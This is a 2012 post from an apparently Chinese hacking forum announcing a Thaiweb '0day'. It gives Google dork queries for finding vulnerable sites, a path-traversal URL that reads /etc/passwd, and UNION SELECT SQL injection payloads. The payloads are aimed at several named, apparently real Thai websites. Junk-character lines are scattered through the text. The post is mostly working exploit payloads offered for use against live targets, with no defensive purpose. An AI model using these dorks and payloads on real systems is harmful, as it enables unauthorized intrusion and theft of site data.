找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1960|回复: 0
打印 上一主题 下一主题

Thaiweb远程文件sql注入漏洞0day

[复制链接]
跳转到指定楼层
楼主
发表于 2012-12-27 08:38:39 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
Google之:
; J6 u6 q; Z8 D  l" \' L9 ~2 W7 s% K9 z) B, \8 e3 ^! V
intext:powered by Thaiweb
# n8 p( c6 n) q' v) ], W( \3 R4 @# ~9 i' R$ }. J8 q8 a
inurl:index.php?page=board.php
$ P: l4 }4 |7 z% w1 U5 K
) C0 C. K8 ~  N
1 R. w1 v4 I( |+ n6 K1 X4 U" L$ ~* l& b6 r" v
利用点1:http://www.xfack.com/index.php?p ... ../../../etc/passwd
" q! E4 B; R+ q1 l& m
3 h4 W6 F  u" ]$ g   T( V; j6 q' x+ ~6 {

' l8 g% r9 u8 q) D7 K利用点2:http://www.xfack.com/index.php?page=boardque.php&bod_id=4'
" E1 ]2 H* w2 \" q0 M  |9 B# @& Y4 J
* \, C; C! A9 D) J

+ |5 C7 O% J- _/ E0 c. z, E* Ghttp://www.keytasin.com//index.p ... d=-4+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,316--7 ?, v3 D6 }$ T8 a

2 g. l' y+ E" M& q! Nhttp://www.autopartnerthailand.c ... d=-4+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,316--7 k2 h3 O0 d4 i* a1 ^' g# ^

5 F% C8 Z9 {4 x+ w7 Ehttp://gift.in.th/index.php?page ... d=-4+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,316--
8 G6 u* [9 F+ [; j- L3 P7 e
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表